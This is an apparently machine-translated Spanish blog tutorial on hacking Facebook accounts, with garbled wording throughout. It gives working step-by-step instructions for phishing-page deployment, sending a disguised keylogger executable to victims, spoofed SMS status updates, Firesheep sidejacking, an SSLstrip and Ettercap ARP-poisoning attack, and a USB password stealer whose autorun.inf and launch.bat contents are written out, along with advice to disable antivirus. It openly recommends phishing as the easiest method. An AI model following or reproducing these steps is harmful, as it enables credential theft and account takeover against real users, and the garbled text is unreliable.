Hemos hablado mucho acerca de la contrasea de craqueo populares mtodos como la fuerza bruta, ataques de diccionario y tablas Rainbow.

Sin embargo, una pregunta que me hacen con frecuencia es si es posible para romper una cuenta de Facebook. As que me gustara aclarar conceptos relacionados con Hacking / Cracking cuentas de Facebook. En primer lugar "Hacking una cuenta de Facebook" y "Cracking cuenta en Facebook" son diferentes terminologas.

Hackear una cuenta de facebook se refiere a mtodos infalibles como el phishing, keyloggers, Ingeniera social, etc Sin embargo, el agrietamiento terminologa se refiere a los mtodos como la fuerza bruta, ataques de diccionario, etc

1) Los ataques de fuerza bruta - qu son los ataques de fuerza bruta?

Bruteforce es una de las metodologas de craqueo ms comunes y ms fiable de contrasea. Un ataque de fuerza bruta intenta todas las combinaciones posibles contra el medio, hasta que la contrasea correcta se encuentra. Sin embargo, el problema con un ataque de fuerza bruta es que a medida que aumenta la complejidad de la contrasea, el tiempo necesario para descifrar una contrasea tambin aumenta.

2) Los ataques de diccionario es-lo que los ataques de diccionario?

La nica diferencia con un ataque de fuerza bruta y ataques de diccionario es que "un ataque de diccionario trata las contraseas que quiero probar". Confuso?. En un ataque de diccionario que tenemos la libertad de elegir una enorme lista de palabras que la gente comnmente se utilizan en su contrasea (Dependiendo de la situacin). El siguiente video te ayudar a entender ms acerca de los ataques de diccionario.

http://www.youtube.com/watch?v=9B4e0p6zbwk&feature=player_embedded (Diccionario tutorial Attacks)

3) Cracking cuentas de Facebook - lo que se Cracking cuentas de Facebook?

Volviendo al tema principal de este artculo. Unas horas atrs, mientras yo estaba viendo la piratera vdeos relacionados en securitytube.net, me encontr con un video en el que el hacker afirm que uno puede utilizar "Hydra para descifrar una contrasea de Facebook". Sin embargo aqu es por qu un ataque de fuerza bruta no funciona contra una cuenta facebeook.

Facebook y todos los dems sitios populares de redes sociales bloquear una cuenta de correo electrnico, despus de algunos intentos fallidos de ingresar. O bien han introducido una "caracterstica de bloqueo de cuentas", o bien se ha introducido un "bloqueo de cuentas", el cual impide que una contrasea automatizado agrietamiento mtodo funcione. Sin embargo, incluso si usted lo consigue trabajo, un mnimo longitud facebook password es aproximadamente de 6 caracteres. amablemente se refieren a la carta y descubre que su tasa de xito.

http://www.youtube.com/watch?feature=player_embedded&v=w8TeD-GO8tc (Cracking Facebook tutorial Cuentas)

4) Hackear una cuenta de Facebook mediante la explotacin de confianza de Facebook Feature amigo?

Facebook est constantemente tratando de mejorar la seguridad de su sitio web mediante la introduccin de nuevas caractersticas de seguridad que ayudan a los usuarios de Facebook para mantenerse a salvo y seguro. Recientemente hemos publicado un informe que alrededor de "83 millones de cuentas de Facebook son falsos", por lo tanto facebook est teniendo un momento difcil mejorar sus servicios y por lo que es libre de spam y ms seguro. Una de las caractersticas de seguridad importantes que Facebook introdujo a finales de 2011 llamada "funcin Trusted Friends".

Esta caracterstica habilita a un usuario de facebook para recuperar su / su cuenta en Facebook, eligiendo tres amigos de confianza que se le proporcionar una clave (cdigo) por facebook y el usuario de facebook tendra que llamar a los amigos de confianza y pedir los cdigos, Una vez que el usuario facebok ha entrado en las tres llaves, l recuperar el acceso a su / cuenta de facebook.

xploiting de Facebook Amigos de confianza Caracterstica de hackear una cuenta de Facebook:

Sin embargo, esta caracterstica puede ser fcilmente explotado para hackear una cuenta de Facebook, un hacker puede fcilmente crear falsos perfiles de Facebook 3 y agregarlo a la cuenta de las vctimas, lo que hace que sea sencillo para un hacker para hackear una cuenta de facebook.

http://www.youtube.com/watch?feature=player_embedded&v=VxbEgZl-f6s (Hack Contrasea Facebook Al tutorial Trusted Friends)

5) Keylogging - lo que se Keylogging?

Esta herramienta es muy fcil de conectar y usar. Todo lo que tienes que hacer es dar una direccin de correo electrnico y una contrasea, donde la informacin robada es entregar. No puede ser ms fcil que eso.

Slo tienes que escribir la direccin de correo electrnico y contrasea, y luego haga clic en el botn Generar. Un nuevo "SERVER.EXE" archivo se crear y la mayor parte del trabajo ya est hecho. Ahora viene la parte importante. Slo tienes que enviar el archivo a la vctima. Cambiar el nombre, cambiar el icono y hacerlo ms presentable para que la vctima se abre con seguridad.

Tan pronto como la vctima abre el archivo, Server.exe obtendr todas las contraseas guardadas y las credenciales de la cuenta de facebook y les dar a ustedes. Para evitar ser detectados, el Hacker facebook tambin buscar todos los procesos relacionados con una suite de seguridad y matarlos despus de la deteccin. Lo ms importante de este software hace es que mata a toda la suite de seguridad detectarlo.

Usted debe saber cmo protegerse de estas amenazas. BitDefender detecta esto como un troyano. Con el fin de mantenerse a salvo asegurar que actualice su antivirus regularmente. Adems, recuerde que no se ejecute los archivos que pueden recibir como archivos adjuntos o por medio de mensajera instantnea, o por lo menos, para escanear antemano.

6) Secuestro de pginas de Facebook Fan?

Recientemente he estado recibiendo muchas quejas de los lectores de RHA que sus pginas de fans de Facebook estn siendo atacados. No hay ciencia de cohetes o da cero se utiliza para cortar las pginas de fans de Facebook. Sin embargo, es un simple error facebook que ayuda a los administradores a eliminar otro administrador. Sin embargo facebook debera establecer una regla que los administradores originales no deben ser eliminados. El siguiente video por Sophos explica lo fcil que es secuestrar las pginas de fans de Facebook. (Este autor Notas Por Annimo (Chris moroso Vlentine).

Sin embargo, es muy extrao ver de acuerdo a la pgina de ayuda de Facebook, administrador primario u original no se puede quitar. Sin embargo, es falso. Que se desarrolla la idea de secuestrar pginas de fans de Facebook.

http://www.youtube.com/watch?feature=player_embedded&v=4LSKEoXJUDY (secuestro de pginas de fans en Facebook tutorial).

7) Hack Facebook Futbol - Vulnerabilidad Facebook Status?

Cuenta de Facebook Status Hack - Metodologa

Hay miles de usuarios de Facebook que utilizan una funcin llamada facebook texto con el fin de actualizar el estado de Facebook. Si ha activado esta funcin todo lo que necesita hacer para actualizar tu estado, basta con escribir en tu estado y enviarlo a "923223265".

Sin embargo, la idea detrs de este hack facebook estado de cuenta es el envo de un sms falsos a partir del nmero de su amigo, por lo que el facebook va a pensar que el mensaje provena de la fuente legtima y por lo tanto se actualizar el estado de las vctimas.

SMS Global

SMSGlobal es un sitio web que te permite enviar sms falsos, La cuenta gratuita slo permite enviar 25 SMS, Sin embargo, la cuenta comercial le permite enviar ms. Todo lo que tienes que hacer es registrarse en SMS global, slo debes activar tu cuenta. Tras iniciar sesin en su cuenta, haga clic en "Enviar SMS a un nmero".

Enviar SMS a: 923223265 (Facebook)

Sender ID De: Nmero de vctimas Mobile.

Advertencia: el estado que desea actualizar.

Contramedidas

Apague facebook mobile actualizar caracterstica.

8) phishing Facebook - lo que es phishing facebook Facebook?

El phishing es el mtodo ms comnmente utilizado para hackear Facebook. La tcnica ms utilizada en la suplantacin de identidad es el uso de Conectar Pginas falsos, tambin conocidos como pginas suplantadas. Estas pginas de acceso falsos se parecen a las pginas de acceso originales de sitios likeYahoo, Gmail, MySpace, etc La vctima es engaada para creer que la pgina falsa de Facebook para ser el real y entrar en su / su contrasea. Pero una vez que el usuario intenta iniciar sesin a travs de estas pginas, su / sus datos de acceso facebook son robados de distancia. Sin embargo phishing requiere conocimiento especializado y habilidades de alto nivel para implementar. Por lo tanto, recomendamos el uso de phishing para hackear cuenta de facebook, ya que es la ms fcil.

1.Una vez downloded pgina facebook login falso ahora extraer el contenido de una carpeta

2.Now pass.php abiertos y Buscar (Ctrl + F) 'http://chrisdefaulter.anonymous.com' y luego cambiarlo a su a es el 'http://www.google.com.pk'

Nota: 'http://www.google.com' es la direccin URL de redireccin, cuando la vctima entrar en su / su correo electrnico y contrasea que ser redirigido to'http :/ / www.google.com "en lugar de" http:// rafayhackingarticles.blogspot.com "

Ahora bien, en Guardar 3.Ahora abierto facebook falso pgina en un wordpad

4.Ahora en la pgina falsa presione Ctrl + F y busque el trmino "action =" Ahora cambie su valor a pass.php es decir action = pass.php

5.Create un id en www.110mb.com, www.ripway.com o t35.com.

Nota: Mucha gente tiene queja de que se prohibi a partir de 110mb.com.ripway.com y t35.com as como una alternativa que puede utilizar ooowebhost.

6.Then cargar todos los archivos Facebook.htm, Pass.php en el directorio de 110MB o de otro tipo y un solo probarlo por ir a http://yoursite.110mb.com/Facebook.htm para el tipo de inicio de sesin page.Just falso alguna informacin en el cuadro de texto y, a continuacin podrs ver en el administrador de archivos que un archivo llamado "Facebook.txt" se crea en la que la contrasea se almacena

7.Go a http://yoursite.110mb.com/Facebookpassword.htm para las contraseas almacenadas!

Cmo funciona?

Cuando un usuario escribe una contrasea nombre de usuario en el cuadro de texto, la informacin se enva al "login.php", que acta como un registrador de contrasea y redirecciona a la pgina "LoginFrame2.htm", que indica "Se ha producido un error temporal Intntelo Una vez ms "en ella. As que cuando las persona hace clic en intentarlo de nuevo lo redirige a la URL real de modo que la vctima no sabe que tusitio es un sitio falso y consigue su contrasea Facebook.com hackeado

9) Ladrones - Ladrones de lo que es?

Casi 80 por ciento de personas% de uso de contraseas almacenadas en el navegador para acceder al facebook, Esto es bastante prctico, pero a veces puede ser muy peligroso, Stealers son software especialmente diseado para capturar las contraseas guardadas almacenadas en el navegador vctimas, Stealers una vez FUD puede ser extremadamente de gran alcance. Si desea ladrones de cmo funcionan y cmo se puede crear la tuya propia

10) Sesin Secuestro - cul es el secuestro de sesin?

Secuestro de sesin puede ser muy peligroso si tiene acceso a Facebook en una conexin de http://, en un secuestro de sesin ataque de un hacker roba la cookie del navegador vctimas que se utiliza para autenticar a un usuario en un sitio web y utiliza para acceder a la cuenta de vctimas , secuestro de sesin se utiliza ampliamente en Lan. Ya he escrito una serie de tres partes sobre cmo secuestro de sesin funciona? y tambin un post aparte en la sesin de Facebook secuestro.

11) Sidejacking Con Firesheep - lo que se Sidejacking Con Firesheep?

Sidejacking ataque fue comn a finales de 2010, sin embargo sigue siendo popular hoy en da, Firesheep es ampliamente utilizado para llevar a cabo ataques sidejacking, Firesheep slo funciona cuando el agresor y la vctima se encuentra en la misma red wifi. Un ataque sidejacking es bsicamente otro nombre para la sesin http secuestro, pero est ms orientado hacia los usuarios wifi.

Recientemente, un nuevo addon de Firefox Firesheep ha sido causa de miles de cuentas de correo electrnico, segn ha informado techcurnch, Firesheep ha sido descargado ms de 104.000 veces

en las ltimas 24 horas aproximadamente, con Firesheep el hacker puede controlar cualquier cuenta sin siquiera saber el nombre de usuario y contrasea de la cuenta deseada, ya que Facebook es un mundo social ms popular sitio web de redes, por lo que ha sido la principal vctima de la misma, utiliza Firesheep sesin HTTP secuestro ataque para obtener acceso no autorizado a un Facebook o cualquier otra cuenta.

En una sesin Http secuestro atacar a un atacante roba vctimas cookies, tiendas Galletas toda la informacin necesaria acerca de la propia cuenta, utilizando esta informacin se puede hackear cuenta de nadie y cambiar su contrasea. Si se obtienen los cookies de la vctima puede hackear cualquier cuenta se registra a la vctima a decir, se puede hackear Facebook Google, Yahoo, Orkut, etc Flickr o cualquier otra cuenta de correo.

Cmo puede un Hacker Hack usar Firesheep un Facebook o cualquier otra cuenta?

Ahora le voy a decir cmo se puede utilizar un hacker Firesheep para hackear un facebook o cualquier otra cuenta, usted necesitar lo siguiente:

Acceso wifi pblico WinPcap Firesheep

1. En primer lugar descargar "Firesheep" desde el enlace de arriba y usar el "OpenWith" en el navegador firefox

2. Una vez que haya instalado Firesheep en Firefox navegador web, haga clic en Ver en la parte superior, a continuacin, Ir a la barra lateral y haga clic en Firesheep

3. Ahora haga clic en el botn superior izquierdo "Iniciar captura" y comenzar a capturar las cookies de sesin de personas en su red wifi, aqu puedes ver la lista de las personas cuyas cookies son capturados y han visitado el sitio web no seguro sabe que Firesheep, Doble haga clic en la foto y usted podr acceder en forma instantnea

12) Mobile Phone Hacking-lo que es la piratera de telfono mvil?

Millones de usuarios de Facebook acceder a Facebook a travs de sus telfonos mviles. En caso de que el hacker puede obtener acceso a las vctimas de telfono mvil, entonces seguramente puede tener acceso a su / cuenta de Facebook. Sus son muchas Mobile Software espionaje utilizados para supervisar un telfono mvil.

El telfono mvil ms popular espa software son:

1. Mobile Spy 2. Spy Phone Oro

13) DNS Spoofing - Qu es DNS Spoofing?

Si la vctima y el agresor est en la misma red, un atacante puede utilizar un ataque de suplantacin de DNS y cambiar la pgina facebook.com original a su propia pgina falsa y por lo tanto se puede obtener acceso a las vctimas cuenta de Facebook.

http://www.youtube.com/watch?v=LU2tS2ip1f8&feature=player_embedded (DNS Spoofing tutorial)

13) USB Hacking-lo que es la piratera USB?

Si un atacante tiene acceso fsico a su equipo, que slo podra insertar un USB programado con una funcin para extraer automticamente las contraseas guardadas en el navegador.

Como sabemos que Windows almacena la mayora de sus contraseas a diario, como las contraseas de MSN Messenger de Yahoo, contraseas, contraseas Myspace etc.Most de la

gente tiene falta de tiempo y que acababa de pedir su Browser / windows para guardar sus contraseas, as como nosotros Sabemos que hay muchas herramientas para recuperar las contraseas guardadas, as que en esta nota voy a explicar sobre cmo hacer un ladrn de contraseas USB y roba las contraseas guardadas.

Cosas que usted necesita?

1) MessenPass - MessenPass es una herramienta de recuperacin de contrasea que revela las contraseas de las siguientes aplicaciones de mensajera instantnea.

2) Mail PassView - Mail PassView es una pequea herramienta de recuperacin de contrasea que revela las contraseas y otros detalles de la cuenta de Outlook Express, Windows Mail, etc POP3

3) IE PassView - IE PassView es un pequeo programa que nos ayuda a ver las contraseas almacenadas en Internet Explorer.

4) Almacenamiento protegido pase espectador (PSPV) - Almacenamiento protegido PassView es una pequea utilidad que revela las contraseas almacenadas en el ordenador a travs de Internet Explorer, Outlook Express y MSN Explorer.

5) Fox Contrasea - Contrasea zorro es un pequeo programa usado para ver las contraseas guardadas en Mozilla Firefox.

Nota: Por favor deshabilite su antivirus antes de realizar estos pasos

1.En primer lugar de todas las herramientas de descarga de las 5 y copiar los archivos ejecutables (. Exe (archivos de la USB Copy es decir, los archivos mspass.exe, mailpv.exe, iepv.exe, pspv.exe y passwordfox.exe en la unidad USB.

2. Cree un Bloc de notas y escriba el texto siguiente en l

[Autorun]

open = launch.bat

ACCIN = Realizar un anlisis de virus

guardar el Bloc de notas y cambie el nombre de

Nuevo documento de texto.txt a autorun.inf

Ahora copia el archivo autorun.inf en su pendrive USB.

3. Crear otra Bloc de notas y escriba el texto siguiente en la misma.

iniciar mspass.exe / sText mspass.txt

iniciar mailpv.exe / sText mailpv.txt

iniciar iepv.exe / sText iepv.txt

iniciar pspv.exe / sText pspv.txt

iniciar passwordfox.exe / sText passwordfox.txt

guardar el Bloc de notas y cambie el nombre de

Nuevo documento de texto.txt a Launch.bat

Copie el archivo launch.bat tambin en el disco USB.

Ahora el ladrn de contraseas USB est listo todo lo que tienes que hacer es insertar en tu ordenador vctimas y una ventana emergente aparecer, en la ventana que aparece, seleccionar la opcin (lanzamiento de anlisis antivirus) tan pronto como usted la haga clic en la siguiente ventana.

Despus de esto se puede ver contrasea guardada en archivos TXT.

14) El hombre en los ataques Media - Qu es el hombre en los ataques Media?

Si la vctima y el agresor se encuentran en la misma red local y en un conmutador de red basada en un hacker puede colocar a s mismo b / w el cliente y el servidor o tambin poda actuar como una puerta de enlace predeterminada y por lo tanto la captura de todo el trfico en el medio, envenenamiento ARP que es el otro nombre para el hombre en el medio de ataque.

ne de la forma ms eficaz de obtener informacin tal como contraseas, identificadores de usuario, etc en LAN (red de rea local) es a travs del hombre en el medio de ataque. No se va a profundizar en el hombre en los ataques por el centro, pero en palabras simples se puede explicar como atacante o un hacker escuchar toda la informacin enviada entre el cliente y el servidor. Para evitar este tipo de ataques proveedores de correo electrnico comenz mediante transferencia de hipertexto seguro (HTTPS) es una combinacin del protocolo de transferencia de hipertexto (HTTP) con protocolo SSL (Secure Socket Layer) Protocolo para proporcionar comunicacin cifrada entre el cliente y el servidor. As que cuando una caries a cabo un ataque de hackers Mimt la vctima Se advierte con un certificado SSL no vlido

En este tutorial voy a ensear cmo llevar a cabo un ataque MITM xito

Concepto: -

Sabemos que HTTP (Hypertext Transfer Protocol) se limita a enviar toda la informacin a travs de texto plano. As que si hacemos la vctima utilizar HTTP en lugar de HTTPS para conectar sitios como Gmail, Pay pal. vamos a ser capaces de llevar a cabo un ataque MITM xito sin causar ninguna suspicacia Para ello vamos a utilizar una herramienta llamada tira SSL

Qu es SSL (Secure Socket Layer)

Cosa que necesitamos

1. Tira SSL: Puede buscar en Google de banda SSL viene tanto en las versiones de Windows y Linux. Me va a utilizar la versin para Windows de este tutorial

2. Ettercap para realizar ataques MITM

Demostracin: -

1. Tira Open SSL y complete toda la informacin requerida para arpsoof, red, tira ssl, datos modificados. Si usted no sabe qu escribir simplemente haga clic en auto check. recuerde verificar si HTTPS a HTTP se incluye en los datos modificados, finalmente haga clic en Aceptar

2. Ahora seleccione IP de la vctima y haga clic en Abrir

3. Ahora ettercap abierto ir a oler-unsniffed oler y seleccione el interfaz de red y haga clic en Aceptar

4. Ahora selecciona los host-scan anfitriones. Una vez completado el escaneado. Lista de host abierto desde la pestaa anfitriones. Ahora seleccione la direccin IP del router como puerta 1 y la IP vctimas como meta 2

5. Ahora seleccione mitm-arp envenenamiento y haga clic en Aceptar, como se muestra

6. Por ltimo, seleccione la puesta en comenzar oler. Ahora bien, cuando la vctima se registra en gmail que va a utilizar HTTP y HTTPS ah que no son capaces de obtener el ID de usuario, las contraseas.

Medidas de contador:

1. siempre que se realiza una transaccin en lnea, tales como el pago con tarjeta de crdito, el Banco login login o correo electrnico siempre asegurarse de que utiliza HTTPS

2. Compruebe siempre el certificado SSL antes de hacer una transaccin en lnea

15) Botnets - cul es botnets? (Slo miembro annimo saber cmo trabajar botnet)

Las botnets no son de uso general para hackear cuentas de Facebook, debido a su costo de instalacin de alta, se utilizan para realizar ataques ms avanzados, Una botnet es bsicamente una coleccin de equipo afectado, el proceso de infeccin es el mismo que el keylogger, sin embargo, una botnet que da , las opciones adicionales para llevar a cabo ataques con el equipo comprometido. Algunas de las botnets ms populares incluyen SpyEye y Zeus.

Nota: La copia o reproduccin de este artculo est estrictamente prohibido y dar lugar a ciertas consecuencias, si usted est reproduciendo o copiar este artculo, asegrese de que le dan un crdito apropiado. (Annimo moroso Chris Valentine)